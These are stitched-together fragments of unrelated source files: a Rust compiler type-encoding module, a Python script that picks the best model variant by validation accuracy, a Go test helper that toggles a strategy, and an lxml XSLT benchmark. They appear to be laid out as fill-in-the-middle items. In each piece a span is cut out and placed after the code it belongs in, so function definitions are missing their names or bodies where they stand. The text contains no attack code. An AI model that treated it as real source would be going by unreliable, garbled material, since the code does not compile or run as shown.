Self, D::Error>; } /// Encode the given value or a previously cached shorthand. pub fn encode_with_shorthand<E, T, M>(encoder: &mut E, value: &T, cache: M) -> Result<(), E::Error> where E: TyEncoder<'tcx>, M: for<'b> Fn(&'b mut E) -> &'b mut FxHashMap<T, usize>, T: EncodableWithShorthand<'tcx, E>, // The discriminant and shorthand must have the same size. T::Variant: DiscriminantKind<Discriminant = isize>, { let existing_shorthand = cache(encoder).get(value).copied(); if let Some(shorthand) = existing_shorthand { return encoder.emit_usize(shorthand); } let variant = value.variant(); let start = encoder.position(); variant.encode(encoder)?; let len = encoder.position() - start; // The shorthand encoding uses the same usize as the // discriminant, with an offset so they can't conflict. let discriminant = intrinsics::discriminant_value(variant); assert!(SHORTHAND_OFFSET > discriminant as usize); let shorthand = start + SHORTHAND_OFFSET; // Get the number of bits that leb128 could fit // in the same space as the fully encoded type. let leb128_bits = len * 7; // Check that the shorthand is a not longer than the // full encoding itself, i.e., it's an obvious win. 
if leb128_bits >= 64 || (shorthand as u64) < (1 << leb128_bits) { cache(encoder).insert(*value, shorthand); } Ok(()) } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for Ty<'tcx> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { encode_with_shorthand(e, self, TyEncoder::type_shorthands) } } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for ty::Binder<ty::PredicateKind<'tcx>> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { encode_with_shorthand(e, &self.skip_binder(), TyEncoder::predicate_shorthands) } } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for ty::Predicate<'tcx> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { self.kind().encode(e) } } impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for AllocId { fn encode(&self, e: &mut E) -> Result<(), E::Error> { e.encode_alloc_id(self) } } macro_rules! encodable_via_deref { ($($t:ty),+) => { $(impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for $t { fn encode(&self, e: &mut E) -> Result<(), E::Error> { (**self).encode(e) } })* } } encodable_via_deref! { &'tcx ty::TypeckResults<'tcx>, ty::Region<'tcx>, &'tcx mir::Body<'tcx>, &'tcx mir::UnsafetyCheckResult, &'tcx mir::BorrowCheckResult<'tcx>, &'tcx mir::coverage::CodeRegion } pub trait TyDecoder<'tcx>: Decoder { const CLEAR_CROSS_CRATE: bool; fn tcx(&self) -> TyCtxt<'tcx>; fn peek_byte(&self) -> u8; fn position(&self) -> usize; fn cached_ty_for_shorthand<F>( &mut self, shorthand: usize, or_insert_with: F, ) -> Result<Ty<'tcx>, Self::Error> where F: FnOnce(&mut Self) -> Result<Ty<'tcx>, Self::Error>; fn with_position<F, R>(&mut self, pos: usize, f: F) -> R where F: FnOnce(&mut Self) -> R; fn map_encoded_cnum_to_current(&self, cnum: CrateNum) -> CrateNum; fn positioned_at_shorthand(&self) -> bool { (self.peek_byte() & (SHORTHAND_OFFSET as u8)) != 0 } fn decode_alloc_id(&mut self) -> Result<AllocId, Self::Error>; } #[inline] pub fn decode_arena_allocable<'tcx, D, T: ArenaAllocatable<'tcx> + Decodable<D>>( decoder: &mut D, ) -> Result<&'tcx T, D::Error> where D: TyDecoder<'tcx>, { Ok(decoder.tcx().arena.alloc(Decodable::decode(decoder)?)) } #[inline] pub fn decode_arena_allocable_slice<'tcx, D, T: ArenaAllocatable<'tcx> + Decodable<D>>( decoder: &mut D, ) -> Result<&'tcx [T], D::Error> where D: TyDecoder<'tcx>, { Ok(decoder.tcx().arena.alloc_from_iter(<Vec<T> as Decodable<D>>::decode(decoder)?)) } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for Ty<'tcx> { #[allow(rustc::usage_of_ty_tykind)] fn decode(decoder: &mut D) -> Result<Ty<'tcx>, D::Error> { // Handle shorthands first, if we have an usize > 0x80. if decoder.positioned_at_shorthand() { let pos = decoder.read_usize()?; assert!(pos >= SHORTHAND_OFFSET); let shorthand = pos - SHORTHAND_OFFSET; decoder.cached_ty_for_shorthand(shorthand, |decoder| { decoder.with_position(shorthand, Ty::decode) }) } else { let tcx = decoder.tcx(); Ok(tcx.mk_ty(ty::TyKind::decode(decoder)?)) } } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Binder<ty::PredicateKind<'tcx>> { fn decode(decoder: &mut D) -> Result<ty::Binder<ty::PredicateKind<'tcx>>, D::Error> { // Handle shorthands first, if we have an usize > 0x80. Ok(ty::Binder::bind(if decoder.positioned_at_shorthand() { let pos = decoder.read_usize()?; assert!(pos >= SHORTHAND_OFFSET); let shorthand = pos - SHORTHAND_OFFSET; decoder.with_position(shorthand, ty::PredicateKind::decode)? } else { ty::PredicateKind::decode(decoder)? 
})) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Predicate<'tcx> { fn decode(decoder: &mut D) -> Result<ty::Predicate<'tcx>, D::Error> { let predicate_kind = Decodable::decode(decoder)?; let predicate = decoder.tcx().mk_predicate(predicate_kind); Ok(predicate) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for SubstsRef<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { let len = decoder.read_usize()?; let tcx = decoder.tcx(); tcx.mk_substs((0..len).map(|_| Decodable::decode(decoder))) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for mir::Place<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { let local: mir::Local = Decodable::decode(decoder)?; let len = decoder.read_usize()?; let projection: &'tcx List<mir::PlaceElem<'tcx>> = decoder.tcx().mk_place_elems((0..len).map(|_| Decodable::decode(decoder)))?; Ok(mir::Place { local, projection }) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Region<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { Ok(decoder.tcx().mk_region(Decodable::decode(decoder)?)) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for CanonicalVarInfos<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { let len = decoder.read_usize()?; let interned: Result<Vec<CanonicalVarInfo<'tcx>>, _> = (0..len).map(|_| Decodable::decode(decoder)).collect(); Ok(decoder.tcx().intern_canonical_var_infos(interned?.as_slice())) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for AllocId { fn decode(decoder: &mut D) -> Result<Self, D::Error> { decoder.decode_alloc_id() } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::SymbolName<'tcx> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { Ok(ty::SymbolName::new(decoder.tcx(), &decoder.read_str()?)) } } macro_rules! impl_decodable_via_ref { ($($t:ty),+) => { $(impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for $t { fn decode(decoder: &mut D) -> Result<Self, D::Error> { RefDecodable::decode(decoder) } })* } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::AdtDef { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { let def_id = <DefId as Decodable<D>>::decode(decoder)?; Ok(decoder.tcx().adt_def(def_id)) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::List<Ty<'tcx>> { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { let len = decoder.read_usize()?; decoder.tcx().mk_type_list((0..len).map(|_| Decodable::decode(decoder))) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::List<ty::Binder<ty::ExistentialPredicate<'tcx>>> { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { let len = decoder.read_usize()?; decoder.tcx().mk_poly_existential_predicates((0..len).map(|_| Decodable::decode(decoder))) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for ty::Const<'tcx> { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().mk_const(Decodable::decode(decoder)?)) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [ty::ValTree<'tcx>] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) 
.map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for Allocation { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().intern_const_alloc(Decodable::decode(decoder)?)) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [(ty::Predicate<'tcx>, Span)] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [mir::abstract_const::Node<'tcx>] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl<'tcx, D: TyDecoder<'tcx>> RefDecodable<'tcx, D> for [mir::abstract_const::NodeId] { fn decode(decoder: &mut D) -> Result<&'tcx Self, D::Error> { Ok(decoder.tcx().arena.alloc_from_iter( (0..decoder.read_usize()?) .map(|_| Decodable::decode(decoder)) .collect::<Result<Vec<_>, _>>()?, )) } } impl_decodable_via_ref! { &'tcx ty::TypeckResults<'tcx>, &'tcx ty::List<Ty<'tcx>>, &'tcx ty::List<ty::Binder<ty::ExistentialPredicate<'tcx>>>, &'tcx Allocation, &'tcx mir::Body<'tcx>, &'tcx mir::UnsafetyCheckResult, &'tcx mir::BorrowCheckResult<'tcx>, &'tcx mir::coverage::CodeRegion } #[macro_export] macro_rules! __impl_decoder_methods { ($($name:ident -> $ty:ty;)*) => { $( #[inline] fn $name(&mut self) -> Result<$ty, Self::Error> { self.opaque.$name() } )* } } macro_rules! impl_arena_allocatable_decoder { ([]$args:tt) => {}; ([decode $(, $attrs:ident)*] [[$name:ident: $ty:ty], $tcx:lifetime]) => { impl<$tcx, D: TyDecoder<$tcx>> RefDecodable<$tcx, D> for $ty { #[inline] fn decode(decoder: &mut D) -> Result<&$tcx Self, D::Error> { decode_arena_allocable(decoder) } } impl<$tcx, D: TyDecoder<$tcx>> RefDecodable<$tcx, D> for [$ty] { #[inline] fn decode(decoder: &mut D) -> Result<&$tcx Self, D::Error> { decode_arena_allocable_slice(decoder) } } }; ([$ignore:ident $(, $attrs:ident)*]$args:tt) => { impl_arena_allocatable_decoder!([$($attrs),*]$args); }; } macro_rules! impl_arena_allocatable_decoders { ([], [$($a:tt $name:ident: $ty:ty,)*], $tcx:lifetime) => { $( impl_arena_allocatable_decoder!($a [[$name: $ty], $tcx]); )* } } rustc_hir::arena_types!(impl_arena_allocatable_decoders, [], 'tcx); arena_types!(impl_arena_allocatable_decoders, [], 'tcx); #[macro_export] macro_rules! implement_ty_decoder { ($DecoderName:ident <$($typaram:tt),*>) => { mod __ty_decoder_impl { use std::borrow::Cow; use rustc_serialize::Decoder; use super::$DecoderName; impl<$($typaram ),*> Decoder for $DecoderName<$($typaram),*> { type Error = String; $crate::__impl_decoder_methods! { read_nil -> (); read_u128 -> u128; read_u64 -> u64; read_u32 -> u32; read_u16 -> u16; read_u8 -> u8; read_usize -> usize; read_i128 -> i128; read_i64 -> i64; read_i32 -> i32; read_i16 -> i16; read_i8 -> i8; read_isize -> isize; read_bool -> bool; read_f64 -> f64; read_f32 -> f32; read_char -> char; read_str -> Cow<'_, str>; } fn error(&mut self, err: &str) -> Self::Error { self.opaque.error(err) } } } } } macro_rules! impl_binder_encode_decode { ($($t:ty),+ $(,)?) 
=> { $( impl<'tcx, E: TyEncoder<'tcx>> Encodable<E> for ty::Binder<$t> { fn encode(&self, e: &mut E) -> Result<(), E::Error> { self.as_ref().skip_binder().encode(e) } } impl<'tcx, D: TyDecoder<'tcx>> Decodable<D> for ty::Binder<$t> { fn decode(decoder: &mut D) -> Result<Self, D::Error> { Ok(ty::Binder::bind(Decodable::decode(decoder)?)) } } )* } } impl_binder_encode_decode! { &'tcx ty::List<Ty<'tcx>>, ty::FnSig<'tcx>, ty::ExistentialPredicate<'tcx>, ty::TraitRef<'tcx>, Vec<ty::GeneratorInteriorTypeCause<'tcx>>, }
use crate::mir::{
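The comments in the ty codec above describe the shorthand scheme: a type or predicate kind is written out in full the first time, its start position is remembered, and later occurrences may be replaced by that position plus SHORTHAND_OFFSET (0x80), which the decoder recognises via the high bit of the first byte. The standalone Python sketch below restates only the "is the shorthand actually a win" rule from the encoder; leb128_len and shorthand_is_win are illustrative helper names for this sketch, not part of the compiler.

# Toy restatement (not rustc code) of the shorthand caching rule above.
SHORTHAND_OFFSET = 0x80

def leb128_len(n):
    # Number of bytes an unsigned LEB128 encoding of n takes (7 payload bits per byte).
    length = 1
    while n >= 0x80:
        n >>= 7
        length += 1
    return length

def shorthand_is_win(start, full_len):
    # Mirror of the cache-insertion check: only remember the shorthand if the
    # usize `start + SHORTHAND_OFFSET` needs no more LEB128 bytes than the
    # full encoding occupied.
    shorthand = start + SHORTHAND_OFFSET
    leb128_bits = full_len * 7
    return leb128_bits >= 64 or shorthand < (1 << leb128_bits)

# A 3-byte encoding that started at position 10: the 2-byte back-reference wins.
assert shorthand_is_win(10, 3) and leb128_len(10 + SHORTHAND_OFFSET) <= 3
# A 1-byte encoding far into the buffer: the back-reference would be longer.
assert not shorthand_is_win(300, 1) and leb128_len(300 + SHORTHAND_OFFSET) > 1

On the decoding side the offset doubles as a tag: because real variant indices stay below 0x80, a first byte with the 0x80 bit set can only be the start of a shorthand usize, which is what positioned_at_shorthand checks.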
select_best_model.py
# coding=utf-8 # Copyright 2021 The Meta-Dataset Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python2, python3 r"""A script for choosing the best variant of a model automatically. It takes as input the root directory of all experiments, and a list of names of directories in that root, each storing the data of an experiment with multiple variants accross which we want to select the best. Each experiment directory should contain a directoy named 'summaries' that hosts subdirectories for the different runs with each one containing event files. These event files are read to figure out which is best in terms of mean validation accuracy, and at which step of that run this best value occurs in. For each of the experiment directories provided, the output information is saved in a 'best.pklz' file in that directory. This file contains a dict with keys 'best_variant', 'best_valid_acc', and 'best_update_num' where the name of the variant is simply the name of the sub-directory corresponding to that variant. Example directory structure (after the script is ran): Root contains: 'Exp1', 'Exp2'. Exp1 contains: 'checkpoints', 'summaries', and best.pklz summaries contains: '1', '2', '3', ..., '20' '1' contains event files '2' contains event files ... '20' contains event files Sample command: # pylint: disable=line-too-long python -m meta_dataset.analysis.select_best_model \ --alsologtostderr \ --all_experiments_root=<experiments_root> \ --experiment_dir_basenames=baseline_imagenet_icml2019_1/3602170,baselinefinetune_imagenet_icml2019_1/3581340 # pylint: enable=line-too-long """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import json import os from absl import logging import numpy as np from six.moves import range from six.moves import zip import six.moves.cPickle as pkl import tensorflow.compat.v1 as tf FLAGS = tf.flags.FLAGS tf.flags.DEFINE_string( 'all_experiments_root', '', 'The overall experiments directory root.') tf.flags.DEFINE_string( 'experiment_dir_basenames', '' 'baseline_imagenet_icml2019_1/3602170,' 'baselinefinetune_imagenet_icml2019_1/3581340', 'A comma-separated list of directory basenames. Adding each basename as a ' 'suffix to FLAGS.all_experiments_root forms a path that stores the data of ' 'an experiment with multiple variants accross which we want to select the ' 'best. Each such path is expected to host a directory named "summaries" ' 'that contains subdirectories for the different runs with each such ' 'subdirectory containing event files.') # TODO(etriantafillou): This assumes the variants to omit are the same for all # experiments that model selection will be ran for which doesn't make much # sense. Maybe just remove this altogether? tf.flags.DEFINE_string( 'restrict_to_variants', '', 'A comma-separated list of ' 'variants to restrict to for model selection. 
This is ' 'useful for example for finding the best out of all ' 'variants that use a specific embedding or image size.') tf.flags.DEFINE_string( 'restrict_to_variants_by_range', '', 'A comma-separated list of ' 'two integers that represent the start and end range (both inclusive) ' 'of variant ids to restrict to.') tf.flags.DEFINE_string( 'description', 'best', 'The description for the output. The output will ' 'then be named as description.pklz and description.txt. For example, this ' 'can be used to reflect that some variants were omitted.') # The following two flags assume that the parameters of the experiments have # been logged (they attempt to read from them). If this is not the case, the # restrict_to_variants flag should be used instead. tf.flags.DEFINE_string( 'restrict_to_architectures', '', 'The comma-separated names of the ' 'embedding networks to restrict to for model selection.') tf.flags.DEFINE_enum( 'restrict_to_pretrained_source', '', ['', 'scratch', 'imagenet'], 'The name of a pretrained_source to ' 'restrict to for model selection.') tf.flags.DEFINE_integer( 'smooth_window', 1, 'rolling average window to be ' 'applied before the best model selection. ' 'Set 1 for no smoothing.') VALIDATION_ACCURACY_TAGS = ( 'valid_acc/mean', 'mean valid acc', 'mean acc', # TODO(doersch): rather unclear tag written by trainer.py ) def get_value_from_params_dir(params_dir, param_names): """Gets the first found value from `param_names` in `params_dir`.""" def _load_params(param_name, params_file, loader, mode): with tf.io.gfile.GFile(params_file, mode) as f: params = loader(f) logging.info('Found params file %s', params_file) return params[param_name] for param_name in param_names: try: try: return _load_params(param_name, os.path.join(params_dir, 'params.json'), json.load, 'r') except tf.errors.NotFoundError: logging.info('%s does not exist in %s', 'params.json', params_dir) try: return _load_params(param_name, os.path.join(params_dir, 'params.pkl'), pkl.load, 'rb') except tf.errors.NotFoundError: logging.info('%s does not exist in %s', 'params.pkl', params_dir) except KeyError: pass raise ValueError('Did not find any of the following keys: %s' % param_names) def
(root_dir, restrict_to_architectures, restrict_to_pretrained_source, restrict_to_variants=None): """Returns a dict that maps each variant name to its event file. The name of the variant is the basename of the directory where it's stored. Assumes the following directory organization root_dir contains a sub-directory for every variant where event files can be found. There may be more than one event file for each variant, e.g. a new one will be created upon restarting an experiment that was pre-empted. So later event files contain the summaries for larger values of 'step'. We need all of them for determining the global 'best'. Args: root_dir: A str. The root directory of experiments of all models variants. restrict_to_architectures: A list of names of architectures to restrict to when choosing the best variant. restrict_to_pretrained_source: A string. The pretrained_source to restrict to when choosing the best variant. restrict_to_variants: Optionally, a set of variant names to restrict to. """ params_dir = os.path.join(root_dir, 'params') summary_dir = os.path.join(root_dir, 'summaries') logging.info('Looking for parameters in params_dir: %s', params_dir) logging.info('Looking for summaries in summary_dir: %s', summary_dir) def get_variant_architecture(name): """Return the architecture of the given variant if recorded; o/w None.""" variant_params_dir = os.path.join(params_dir, name) architecture = get_value_from_params_dir( variant_params_dir, ( '_gin.Learner.embedding_fn', # The following are for backwards compatibility. '_gin.Trainer.embedding_network', '_gin.LearnerConfig.embedding_network', )) return architecture def get_variant_pretrained_source(name): """Return the pretrained src of the given variant if recorded; o/w None.""" variant_params_dir = os.path.join(params_dir, name) pretrained_source = get_value_from_params_dir( variant_params_dir, '_gin.Trainer.pretrained_source') if not pretrained_source: # Backwards compatibility. pretrained_source = get_value_from_params_dir( variant_params_dir, '_gin.LearnerConfig.pretrained_source') return pretrained_source def keep_variant(name): """Determine if the variant in directory name should be considered.""" value_error_msg = ( 'Requested to restrict to an architecture or ' 'pretrained_source but the given experiment does not ' 'have its params recorded. Looked in: {}'.format(params_dir)) if restrict_to_architectures: architecture = get_variant_architecture(name) if architecture is None: raise ValueError(value_error_msg) valid_architecture = (not restrict_to_architectures or architecture in restrict_to_architectures) if restrict_to_pretrained_source: pretrained_source = get_variant_pretrained_source(name) if pretrained_source is None: raise ValueError(value_error_msg) valid_pretrained_source = ( not restrict_to_pretrained_source or pretrained_source == restrict_to_pretrained_source) valid_variant_name = True if restrict_to_variants is not None: valid_variant_name = name in restrict_to_variants return (valid_architecture and valid_pretrained_source and valid_variant_name) variant_names = [ fname for fname in tf.io.gfile.listdir(summary_dir) if tf.io.gfile.isdir(os.path.join(summary_dir, fname)) ] if not variant_names: # Maybe there are no variants, and we are already in the directory that # contains the summaries. In this case, we consider that the current # directory (.) is the only variant. variant_names = ['.'] # Further filter variant names based on the given restrictions. 
variant_names = [name for name in variant_names if keep_variant(name)] if not variant_names: raise ValueError('Found no subdirectories in {}. Was expecting a ' 'subdirectory per variant.'.format(summary_dir)) variant_paths = [ os.path.join(summary_dir, variant_dir) for variant_dir in variant_names ] event_paths = {} for variant_path, variant_name in zip(variant_paths, variant_names): event_filenames = [ f_name for f_name in tf.io.gfile.listdir(variant_path) if f_name.startswith('events.out.tfevents') ] if len(event_filenames) < 1: logging.warn('Skipping empty variant %s.', variant_path) logging.info( 'Was expecting at least one event file ' 'in directory %s. Instead, found %d.', variant_path, len(event_filenames)) continue event_paths[variant_name] = [ os.path.join(variant_path, event_filename) for event_filename in event_filenames ] logging.info('Found event files for variants: %s', list(event_paths.keys())) return event_paths # TODO(crisnv): add smooth_type='uniform' that defines the smooth policy def moving_average(x, smooth_window): """Returns a smoothed version of x. This smoothes the x array according to the smooth_window parameter. Args: x: The array to smooth. smooth_window: An integer that defines the neighborhood to be used in smoothing. """ conv_filter = getattr(moving_average, 'conv_filter', None) if conv_filter is None or (moving_average.conv_filter_size != smooth_window): moving_average.conv_filter = np.ones((smooth_window,)) / smooth_window moving_average.conv_filter_size = smooth_window # if smooth_window is even, pad accordingly to keep stream size x = np.pad(x, (smooth_window // 2, smooth_window - 1 - (smooth_window // 2)), 'reflect') return np.convolve(x, moving_average.conv_filter, mode='valid') def extract_best_from_event_file(event_path, smooth_window, log_details=False): """Returns the best accuracy and the step it occurs in in the given events. This searches the summaries written in a given event file, which may be only a subset of the total summaries of a run, since the summaries of a run are sometimes split into multiple event files. Args: event_path: A string. The path to an event file. smooth_window: An integer that defines the neighborhood to be used in smoothing before the argmax (use <=1 for no smoothing) log_details: A boolean. Whether to log details regarding skipped event paths in which locating the validation accuracy tag failed. """ steps, valid_accs = [], [] try: for event in tf.train.summary_iterator(event_path): step = event.step for value in event.summary.value: if any( valid_tag in value.tag for valid_tag in VALIDATION_ACCURACY_TAGS): steps.append(step) valid_accs.append(value.simple_value) except tf.errors.DataLossError: if log_details: tf.logging.info( 'Omitting events from event_path {} because ' 'tf.train.summary_iterator(event_path) failed.'.format(event_path)) return 0, 0 if not valid_accs: # Could happen if there is no DataLossError above but for some reason # there is no validation accuracy tag found in the summary values. 
tf.logging.info( 'Did not find any validation accuracy tags ({}) in event_path {}' .format(' or '.join(VALIDATION_ACCURACY_TAGS), event_path)) return 0, 0 if smooth_window > 1: valid_accs = moving_average(valid_accs, smooth_window) argmax_ind = np.argmax(valid_accs) best_acc = valid_accs[argmax_ind] best_step = steps[argmax_ind] if log_details: tf.logging.info('Successfully read event_path {} with best_acc {}'.format( event_path, best_acc)) return best_acc, best_step def extract_best_from_variant(event_paths, smooth_window): """Returns the best accuracy and the step it occurs in for the given run. Args: event_paths: A list of strings. The event files of the given run. smooth_window: An integer that defines the neighborhood to be used in smoothing before the argmax (use <=1 for no smoothing) Raises: RuntimeError: No 'valid' event file for the given variant ('valid' here refers to an event file that has a validation accuracy tag). """ best_step = best_acc = -1 for event_path in event_paths: best_acc_, best_step_ = extract_best_from_event_file( event_path, smooth_window) if best_acc_ > best_acc: best_acc = best_acc_ best_step = best_step_ if best_acc <= 0: raise RuntimeError('Something went wrong with the summary event reading.') return best_acc, best_step def main(argv): del argv experiment_paths = [ os.path.join(FLAGS.all_experiments_root, basename) for basename in FLAGS.experiment_dir_basenames.split(',') ] # Perform model selection for each provided experiment root. for root_experiment_dir in experiment_paths: stars_string = '\n**************************************\n' architecture_string = '' if FLAGS.restrict_to_architectures: architecture_string = ' out of the {} variants'.format( FLAGS.restrict_to_architectures) logging.info('%sSelecting the best variant for: %s%s.%s', stars_string, root_experiment_dir, architecture_string, stars_string) if FLAGS.restrict_to_variants_by_range and FLAGS.restrict_to_variants: raise ValueError('Please provide only one of ' 'FLAGS.restrict_to_variants_by_range and ' 'FLAGS.restrict_to_variants, not both.') restrict_to_variants = None if FLAGS.restrict_to_variants_by_range: start, end = FLAGS.restrict_to_variants_by_range.split(',') start, end = int(start), int(end) restrict_to_variants = set( [str(variant_id) for variant_id in range(start, end + 1)]) if FLAGS.restrict_to_variants: restrict_to_variants = set(FLAGS.restrict_to_variants.split(',')) restrict_to_architectures = [] if FLAGS.restrict_to_architectures: restrict_to_architectures = FLAGS.restrict_to_architectures.split(',') smooth_window = FLAGS.smooth_window event_paths = get_paths_to_events( root_experiment_dir, restrict_to_architectures, FLAGS.restrict_to_pretrained_source, restrict_to_variants=restrict_to_variants) # Read the event file of each variant to find the highest mean validation # accuracy reached with it. best_variant = '' best_valid_acc = -1 best_step = -1 for variant_name, event_path in event_paths.items(): best_valid_acc_, best_step_ = extract_best_from_variant( event_path, smooth_window) if best_valid_acc_ > best_valid_acc: best_variant = variant_name best_valid_acc = best_valid_acc_ best_step = best_step_ output_dict = { 'best_variant': best_variant, 'best_valid_acc': best_valid_acc, 'best_update_num': best_step } # Create a more informative description if necessary. 
description = FLAGS.description if FLAGS.restrict_to_architectures and FLAGS.description == 'best': description += '_{}'.format(FLAGS.restrict_to_architectures) if (FLAGS.restrict_to_pretrained_source and FLAGS.description == 'best'): if FLAGS.restrict_to_pretrained_source == 'scratch': description += '_trained_from_scratch' else: description += '_pretrained_on_{}'.format( FLAGS.restrict_to_pretrained_source) if FLAGS.smooth_window > 1: description += '_smoothed_by_window_{}'.format(smooth_window) output_path_pklz = os.path.join(root_experiment_dir, '{}.pklz'.format(description)) with tf.io.gfile.GFile(output_path_pklz, 'wb') as f: pkl.dump(output_dict, f, protocol=pkl.HIGHEST_PROTOCOL) # Also write this info as a .txt file for easier reading. output_path_txt = os.path.join(root_experiment_dir, '{}.txt'.format(description)) with tf.io.gfile.GFile(output_path_txt, 'w') as f: f.write( 'best_variant: {}\nbest_valid_acc: {}\nbest_update_num: {}\n'.format( best_variant, best_valid_acc, best_step)) logging.info( 'Best variant: %s. Best valid acc: %s. Best update num: %d. ' 'Just wrote this info to %s and %s', best_variant, best_valid_acc, best_step, output_path_pklz, output_path_txt) if __name__ == '__main__': logging.set_verbosity(logging.INFO) tf.app.run(main)
get_paths_to_events
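The docstring of select_best_model.py above describes picking, per experiment, the variant and step with the highest (optionally smoothed) mean validation accuracy. The following standalone sketch restates that per-variant rule with plain NumPy; smooth and best_of_variant are hypothetical helper names and the numbers are made up rather than read from real event files.

# Minimal sketch of the per-variant selection rule: smooth the validation
# curve with a centered rolling mean (reflect padding keeps the length),
# then take the argmax and report the corresponding step.
import numpy as np

def smooth(values, window):
    if window <= 1:
        return np.asarray(values, dtype=float)
    kernel = np.ones(window) / window
    padded = np.pad(values, (window // 2, window - 1 - window // 2), 'reflect')
    return np.convolve(padded, kernel, mode='valid')

def best_of_variant(steps, valid_accs, smooth_window=1):
    accs = smooth(valid_accs, smooth_window)
    best = int(np.argmax(accs))
    return float(accs[best]), steps[best]

steps = [1000, 2000, 3000, 4000]
valid_accs = [0.42, 0.55, 0.53, 0.50]
print(best_of_variant(steps, valid_accs, smooth_window=1))  # (0.55, 2000)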
strategies.go
package testhelpers import ( "fmt" "testing" "github.com/ory/kratos/driver/config" ) func
(t *testing.T, c *config.Provider, strategy string, enable bool) { c.MustSet(fmt.Sprintf("%s.%s.enabled", config.ViperKeySelfServiceStrategyConfig, strategy), enable) }
StrategyEnable
bench_xslt.py
import sys, copy from itertools import * from StringIO import StringIO import benchbase from benchbase import with_attributes, with_text, onlylib, serialized ############################################################ # Benchmarks ############################################################ class XSLTBenchMark(benchbase.TreeBenchMark): @onlylib('lxe') def bench_xslt_extensions_old(self, root): tree = self.etree.XML("""\ <xsl:stylesheet version="1.0" xmlns:l="test" xmlns:testns="testns" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <l:data>TEST</l:data> <xsl:template match="/"> <l:result> <xsl:for-each select="*/*"> <xsl:copy-of select="testns:child(.)"/> </xsl:for-each> </l:result> </xsl:template> </xsl:stylesheet> """) def return_child(_, elements):
extensions = {('testns', 'child') : return_child} transform = self.etree.XSLT(tree, extensions) for i in range(10): transform(root) @onlylib('lxe') def bench_xslt_document(self, root): transform = self.etree.XSLT(self.etree.XML("""\ <xsl:stylesheet version="1.0" xmlns:l="test" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <l:data>TEST</l:data> <xsl:template match="/"> <l:result> <xsl:for-each select="*/*"> <l:test><xsl:copy-of select="document('')//l:data/text()"/></l:test> </xsl:for-each> </l:result> </xsl:template> </xsl:stylesheet> """)) transform(root) if __name__ == '__main__': benchbase.main(XSLTBenchMark)
return elements[0][0]
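The benchmark above exercises lxml's XSLT extension functions: a Python callable is registered under a (namespace URI, name) pair and invoked from XPath inside the stylesheet, receiving the selected node-set as its argument. Below is a small standalone sketch of that mechanism using lxml's documented extensions= argument; the namespace, element names, and expected output are illustrative only and are not taken from the benchmark.

# Minimal sketch of an lxml XSLT extension function, assuming lxml is installed.
from lxml import etree

stylesheet = etree.XML("""\
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:demo="demo">
  <xsl:template match="/">
    <result><xsl:copy-of select="demo:child(*)"/></result>
  </xsl:template>
</xsl:stylesheet>
""")

def child(context, elements):
    # `elements` is the node-set selected by the caller; return its first child.
    return elements[0][0]

transform = etree.XSLT(stylesheet, extensions={('demo', 'child'): child})
doc = etree.XML('<root><a><b>hello</b></a></root>')
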